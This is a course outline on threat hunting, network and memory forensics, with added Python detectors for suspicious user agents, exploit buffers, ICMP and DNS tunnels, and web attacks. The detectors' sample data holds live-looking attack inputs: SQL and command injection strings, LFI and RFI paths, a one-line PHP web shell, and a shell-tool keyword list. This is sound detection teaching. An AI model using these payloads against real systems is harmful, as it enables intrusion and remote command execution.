In this course students will learn how to conduct threat hunting and compromise assessment.

In the first module I created a real-life attack scenario as an adversary simulation in a demo lab. I lecture to my students about cyber threat intelligence sources and types and basic definitions and terms, and I critique the capabilities of security devices to explain why we need monitoring and a SIEM infrastructure.

In the second module I give you theoretical knowledge about real attack techniques such as SQL injection, buffer overflow exploit code, SSH tunneling methods and more. I teach my students how to collect full pcap traffic and which tools should be used for analysis. In this module I analyze tunnels, pivot points, web attacks, remote code execution exploits, web shells and web attack traffic from pcap files, and I share my real-world analysis experience with my students.

In the third module I first present the fundamental Windows processes and the process injection, hollowing, PE injection and thread injection techniques and tools theoretically. Then I teach you how to dump memory samples for memory forensics, and I analyze the memory image of the Stuxnet attack, the Cridex, Zeus and DarkComet RAT memory images, and the memory image of a DLL injection event.

In the fourth module I perform threat hunting over ELK. First I explain the event ID numbers that are commonly used for hunting, and I analyze a real-life scenario in which I detected malicious Word documents, HTA files, unsigned EXE files, VBS files and more. I teach you how to detect and investigate tunneling methods and persistence methods such as registry keys, services and scheduled tasks. Some techniques such as LOLBAS are used in the attack lab, and we investigate and map them using the MITRE framework. Google Rapid Response and osquery usage and labs are performed by me.
Important Note: My Udemy training only includes the videos. Memory images, pcaps and virtual machines are not shared on Udemy. I am creating the lab environment on a different cloud platform; when I complete the lab network in the cloud I will announce it, and you can purchase it separately from this course.
I will teach you how to calculate the requirements for full packet collection. You will learn the tools and systems for collecting full pcap captures in a network. You will also find out why we implement network forensics for detection.
In this lesson we analyze basic protocol connections such as MySQL, HTTP, FTP and NFS. You will learn Wireshark basics and basic protocol analysis.
Students will analyze DNS and SMTP packets to detect phishing attacks. They will learn how to extract malicious files from network traffic.
In this lesson students learn to detect protocol-port mismatches.
In this lesson students learn how to detect malware or attack traffic from abnormal user agents.
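One way to turn this lesson's idea into code, as an added example that is not part of the course material: long-tail analysis of User-Agent strings, combining content checks (known tool strings, obsolete browser versions, a missing header) with frequency (a string seen only a couple of times, from a single host, is an outlier in a managed fleet). The request records, the marker list and the thresholds are constructed assumptions and would be tuned to the environment.

```python
# Added example (not the course's own material): long-tail analysis of
# User-Agent strings. Records, marker list and thresholds are constructed.
from collections import Counter, defaultdict
import re

# Constructed sample of (client_ip, user_agent) pairs as a proxy log or
# Zeek http.log would record them. Not real traffic.
CHROME = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
FIREFOX = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0"
SAMPLE_REQUESTS = [
    ("10.0.0.11", CHROME),
    ("10.0.0.12", CHROME),
    ("10.0.0.13", CHROME),
    ("10.0.0.12", FIREFOX),
    ("10.0.0.13", FIREFOX),
    ("10.0.0.14", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"),
    ("10.0.0.14", ""),
    ("10.0.0.15", "python-requests/2.31.0"),
]

# Substrings that rarely come from an interactive browser on a workstation
# (assumed list for illustration).
TOOL_MARKERS = ("python-requests", "curl/", "wget/", "powershell", "go-http-client", "java/")


def flag_user_agents(records, rare_threshold=2):
    """Return {user_agent: [reasons]} for user agents worth a closer look.

    Two complementary signals: content (known tool strings, obsolete browser
    versions, missing header) and frequency (a string seen at most
    rare_threshold times, and only from one host, is an outlier).
    """
    freq = Counter(ua for _, ua in records)
    hosts = defaultdict(set)
    for ip, ua in records:
        hosts[ua].add(ip)

    findings = {}
    for ua, n in freq.items():
        reasons = []
        if ua == "":
            reasons.append("missing User-Agent header")
        else:
            low = ua.lower()
            if any(marker in low for marker in TOOL_MARKERS):
                reasons.append("scripting tool / library user agent")
            if re.search(r"MSIE [1-7]\.", ua):
                reasons.append("obsolete browser string, common in malware templates")
        if n <= rare_threshold and len(hosts[ua]) == 1:
            reasons.append(f"rare: {n} request(s), single host {next(iter(hosts[ua]))}")
        if reasons:
            findings[ua] = reasons
    return findings


if __name__ == "__main__":
    for ua, reasons in flag_user_agents(SAMPLE_REQUESTS).items():
        print(repr(ua), "->", "; ".join(reasons))
```

Run on the constructed sample, the three browser-looking strings from several hosts pass, while the empty header, the MSIE 6.0 string and the python-requests string are each reported with both a content reason and a rarity reason.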
In this lesson students learn to analyze ransomware traffic and examine its traffic patterns.
In this lesson students learn the remote code execution exploit mechanism theoretically. After that they will learn how to detect shellcode, return addresses and NOP values to find exploit code in network traffic.
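The three indicators named above (NOP sled, repeated return address, shellcode bytes) as detection heuristics over a reassembled TCP payload. This is an added example, not course material; the sample payload is constructed to have the shape of a classic stack-overflow buffer, and its "shellcode" is inert stand-in bytes that only carry the strings and opcode a detector keys on.

```python
# Added example (not course material): payload heuristics a network analyst
# can apply to a reassembled TCP stream when hunting for a stack-overflow
# exploit. SAMPLE_PAYLOAD is constructed; its "shellcode" bytes are inert.
import struct


def longest_nop_run(data: bytes, nop: int = 0x90) -> int:
    """Length of the longest run of consecutive NOP (0x90) bytes: the sled."""
    best = run = 0
    for b in data:
        run = run + 1 if b == nop else 0
        best = max(best, run)
    return best


def repeated_dword(data: bytes, min_repeats: int = 4):
    """(value, repeats) for the longest run of one 4-byte little-endian value.

    Exploits overwrite the saved return address with the same value many
    times to tolerate small offset errors. All four alignments are scanned,
    and values made of a single repeated byte (filler, NOPs) are ignored.
    Returns (None, 0) if nothing reaches min_repeats.
    """
    best = (None, 0)
    for offset in range(4):
        prev, run = None, 0
        for i in range(offset, len(data) - 3, 4):
            value = struct.unpack_from("<I", data, i)[0]
            run = run + 1 if value == prev else 1
            prev = value
            if run > best[1] and (value & 0xFF) * 0x01010101 != value:
                best = (value, run)
    return best if best[1] >= min_repeats else (None, 0)


# Byte strings that appear verbatim in a lot of classic x86 Linux shellcode.
SHELLCODE_MARKERS = {
    b"/bin/sh": "embedded /bin/sh string",
    b"\xcd\x80": "int 0x80 syscall opcode",
}


def analyze_payload(data: bytes) -> dict:
    """Summarize the exploit indicators found in one payload."""
    addr, reps = repeated_dword(data)
    return {
        "nop_sled": longest_nop_run(data),
        "return_address": None if addr is None else f"0x{addr:08x} x{reps}",
        "markers": [why for needle, why in SHELLCODE_MARKERS.items() if needle in data],
    }


# Constructed payload: 64 bytes of filler, a 48-byte NOP sled, inert bytes
# standing in for shellcode, then one return address repeated 8 times.
SAMPLE_PAYLOAD = (
    b"A" * 64
    + b"\x90" * 48
    + b"\x31\xc0" + b"/bin/sh\x00" + b"\xcd\x80"   # stand-in, not runnable shellcode
    + struct.pack("<I", 0xBFFFF3C0) * 8
)

if __name__ == "__main__":
    print(analyze_payload(SAMPLE_PAYLOAD))
```

Scanning all four alignments matters because the payload's position in the stream is unknown; the correct alignment always yields the longest run, so the rotated values seen at the other three never win. A long run of any single byte is reported as the sled only for 0x90; in practice analysts also check for alternative single-byte sled instructions, which this example leaves out.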
In this lesson students learn how to detect SSH tunnels in network traffic. First I explain the SSH tunnel mechanism theoretically, then I show you how to establish an SSH tunnel and you will analyze it.
In this lesson students learn how to detect ICMP tunnels in network traffic. First I explain the ICMP tunnel mechanism theoretically, then I show you how to establish an ICMP tunnel and you will analyze it.
In this lesson students learn how to detect DNS tunnels in network traffic. First I explain the DNS tunnel mechanism theoretically, then I show you how to establish a DNS tunnel and you will analyze it.
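An added example covering this lesson and the ICMP tunnel lesson before it (it is not the course's own material). Both tunnels hide data inside a protocol whose legitimate content is predictable, so one byte-entropy helper serves both checks: echo payloads that are neither a known ping pattern nor small and low-entropy, and DNS names whose subdomain labels are long, high-entropy and numerous. The packets, queries and thresholds are constructed assumptions.

```python
# Added example (not course material) for the ICMP and DNS tunnel lessons.
# Packets, queries and thresholds below are constructed assumptions.
import hashlib
import math
from collections import Counter, defaultdict


def shannon_entropy(data) -> float:
    """Bits per symbol of a bytes/str sequence (0.0 for a constant, 8.0 max for bytes)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


# --- ICMP: echo payloads from real ping tools are fixed, low-entropy patterns.
WINDOWS_PING = b"abcdefghijklmnopqrstuvwabcdefghi"


def looks_like_ping_payload(payload: bytes) -> bool:
    """Windows ping sends a fixed alphabet; iputils sends 8 timestamp bytes then 0x10, 0x11, ..."""
    if payload == WINDOWS_PING:
        return True
    return len(payload) > 8 and payload[8:] == bytes(range(0x10, 0x10 + len(payload) - 8))


def flag_icmp_payloads(payloads, entropy_threshold=4.0, max_len=64):
    """Return [(length, entropy)] for echo payloads that are not a known ping
    pattern and are either high-entropy or unusually large."""
    out = []
    for p in payloads:
        if looks_like_ping_payload(p):
            continue
        e = shannon_entropy(p)
        if e > entropy_threshold or len(p) > max_len:
            out.append((len(p), round(e, 2)))
    return out


# --- DNS: tunnels encode data in subdomain labels, so examine the labels.
def split_query(qname: str, suffix_labels: int = 2):
    """Split 'a.b.example.net' into ('example.net', 'a.b') (suffix depth is an assumption)."""
    labels = qname.rstrip(".").split(".")
    return ".".join(labels[-suffix_labels:]), ".".join(labels[:-suffix_labels])


def flag_dns_queries(queries, max_label=40, entropy_threshold=3.5, min_unique=5):
    """queries: iterable of (client, qname, qtype). Returns {domain: [reasons]}."""
    stats = defaultdict(lambda: {"subs": set(), "long": 0, "high_entropy": 0, "bulk_types": 0})
    for _, qname, qtype in queries:
        domain, sub = split_query(qname)
        st = stats[domain]
        st["subs"].add(sub)
        if any(len(label) > max_label for label in sub.split(".")):
            st["long"] += 1
        if sub and shannon_entropy(sub.replace(".", "")) > entropy_threshold:
            st["high_entropy"] += 1
        if qtype in ("TXT", "NULL"):  # record types tunnels favour for large answers
            st["bulk_types"] += 1
    findings = {}
    for domain, st in stats.items():
        reasons = []
        if len(st["subs"]) >= min_unique:
            reasons.append(f"{len(st['subs'])} unique subdomains")
        if st["long"]:
            reasons.append(f"{st['long']} queries with a label over {max_label} chars")
        if st["high_entropy"]:
            reasons.append(f"{st['high_entropy']} high-entropy subdomains")
        if st["bulk_types"]:
            reasons.append(f"{st['bulk_types']} TXT/NULL queries")
        if reasons:
            findings[domain] = reasons
    return findings


# Constructed samples.
LINUX_PING = bytes(8) + bytes(range(0x10, 0x40))     # 56-byte iputils payload
TUNNEL_ICMP = bytes(range(128, 256))                  # 128 distinct bytes, 7.0 bits/byte
SAMPLE_ICMP = [WINDOWS_PING, LINUX_PING, TUNNEL_ICMP]
SAMPLE_DNS = [("10.0.0.5", "www.example.com", "A"), ("10.0.0.5", "mail.example.com", "A")] + [
    ("10.0.0.7", hashlib.sha256(f"chunk{i}".encode()).hexdigest() + ".tun.example.net", "TXT")
    for i in range(6)
]

if __name__ == "__main__":
    print(flag_icmp_payloads(SAMPLE_ICMP))
    print(flag_dns_queries(SAMPLE_DNS))
```

The per-domain aggregation is the important design choice for DNS: a single long label is weak evidence, but many unique, long, TXT-type queries under one registered domain from one client over a short window is the signature the lesson's lab traffic would show. The fixed two-label suffix is a simplification; a public-suffix list gives the right registered domain for names like example.co.uk.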
I will teach you how to perform timeline analysis and map the tunnels to resolve each node and clarify the pivot points in the network.
SQL injection basics are explained theoretically with an example source code, and you will learn how to analyze and detect SQL injection in network traffic.
Command injection basics are explained theoretically with an example source code, and you will learn how to analyze and detect command injection in network traffic.
You will learn the fundamental functions of web shells and how to analyze their execution. In this lesson you will learn how to detect web shells in network traffic.
File upload basics are explained theoretically with an example source code, and you will learn how to analyze and detect file upload attacks in network traffic.
RFI/LFI basics are explained theoretically with an example source code, and you will learn how to analyze and detect RFI/LFI attacks in network traffic.
You will learn basic XSS detection by investigating network traffic.
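The detection side of the web attack lessons above (SQL injection, command injection, web shells, file upload, RFI/LFI and XSS) as one added example that is not the course's tooling: a classifier over HTTP requests reassembled from a pcap. The signatures are deliberately simplified and illustrative, and the requests, header names and parameter names it keys on are constructed assumptions a practitioner would extend.

```python
# Added example (not the course's tooling): classify HTTP requests from a
# pcap into web-attack categories with simplified, illustrative signatures.
# The sample requests are constructed.
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

SHELL_WORDS = r"\b(whoami|id|uname|cat|ls|dir|nc|bash|sh|wget|curl|powershell|net\s+user)\b"
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|jsp|aspx?)$", re.I)
RULES = {
    "sql_injection": re.compile(r"'\s*(or|and)\s*'?\w*'?\s*=|union\s+select|'\s*--|sleep\(", re.I),
    "command_injection": re.compile(r"(;|\||`|\$\()\s*" + SHELL_WORDS, re.I),
    "lfi": re.compile(r"(\.\./){2,}|/etc/passwd|/proc/self"),
    "rfi": re.compile(r"=\s*(https?|ftp)://", re.I),
    "xss": re.compile(r"<script|onerror\s*=|javascript:", re.I),
}


def decode(s: str, rounds: int = 2) -> str:
    """Undo URL encoding twice so a double-encoded payload (%253C for '<') is also seen."""
    for _ in range(rounds):
        s = unquote_plus(s)
    return s


def classify(req: dict) -> list:
    """req = {"method", "uri", "headers", "body"}; returns the sorted attack labels."""
    parts = urlsplit(req["uri"])
    path = decode(parts.path)
    ctype = req.get("headers", {}).get("Content-Type", "")
    body = req.get("body", "")
    params = dict(parse_qsl(parts.query, keep_blank_values=True))
    if "application/x-www-form-urlencoded" in ctype:
        params.update(parse_qsl(body, keep_blank_values=True))
    text = decode(parts.path + "?" + parts.query) + "\n" + decode(body)
    labels = {name for name, rx in RULES.items() if rx.search(text)}
    # Web shell use: a server-side script receiving a command via a cmd-style parameter.
    if SCRIPT_EXT.search(path) and any(
        k in ("cmd", "c", "exec", "command") and re.search(SHELL_WORDS, decode(v), re.I)
        for k, v in params.items()
    ):
        labels.add("webshell")
    # Upload of server-side code: a multipart part whose filename has a script extension.
    if "multipart/form-data" in ctype and re.search(
        r'filename="[^"]*\.(php\d?|phtml|jsp|aspx?)"', body, re.I
    ):
        labels.add("file_upload")
    return sorted(labels)


FORM = {"Content-Type": "application/x-www-form-urlencoded"}
MULTIPART = {"Content-Type": "multipart/form-data; boundary=XX"}
SAMPLE_REQUESTS = {
    "benign": {"method": "GET", "uri": "/products?id=1", "headers": {}, "body": ""},
    "sqli": {"method": "GET", "uri": "/products?id=1%27+OR+%271%27%3D%271", "headers": {}, "body": ""},
    "cmdi": {"method": "GET", "uri": "/ping?host=10.0.0.1%3Bid", "headers": {}, "body": ""},
    "lfi": {"method": "GET", "uri": "/view?page=../../../../etc/passwd", "headers": {}, "body": ""},
    "rfi": {"method": "GET", "uri": "/view?page=http://203.0.113.10/shell.txt", "headers": {}, "body": ""},
    "xss": {"method": "GET", "uri": "/search?q=%3Cscript%3Ealert(1)%3C%2Fscript%3E", "headers": {}, "body": ""},
    "webshell": {"method": "POST", "uri": "/uploads/avatar.php", "headers": FORM, "body": "cmd=whoami"},
    "upload": {"method": "POST", "uri": "/upload", "headers": MULTIPART,
               "body": '--XX\r\nContent-Disposition: form-data; name="f"; filename="avatar.php"\r\n\r\n'
                       '<?php echo shell_exec($_REQUEST["c"]); ?>\r\n--XX--'},
}

if __name__ == "__main__":
    for name, req in SAMPLE_REQUESTS.items():
        print(f"{name:9s} {req['method']} {req['uri']:45s} -> {classify(req)}")
```

Two points the regexes alone do not make: the web shell and file upload checks look at request structure (a script path receiving a command parameter; a multipart part with a script filename) rather than at a string, because shell traffic is often otherwise unremarkable; and everything is matched after URL decoding, since an encoded `%27` or `%3C` never matches the raw bytes. The RFI rule will also fire on legitimate redirect or callback parameters carrying a URL, so it is a triage prompt, not a verdict.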
In this lesson you are going to learn the Cyber Kill Chain method by watching a real-life attack scenario in a lab network. Various techniques are used, such as port scanning, client-side attacks with malicious documents, RCE exploits, lateral movement, tunneling techniques such as ICMP, DNS, L2 VPN pivoting and SOCKS5, web attacks and password attacks. I teach you the Cyber Kill Chain step by step while you watch the attack cycle.
In this lesson we created a scenario based on hacking techniques and critiqued the security devices. We created a table of the detection and prevention capabilities of security devices to explain our SIEM and network monitoring needs.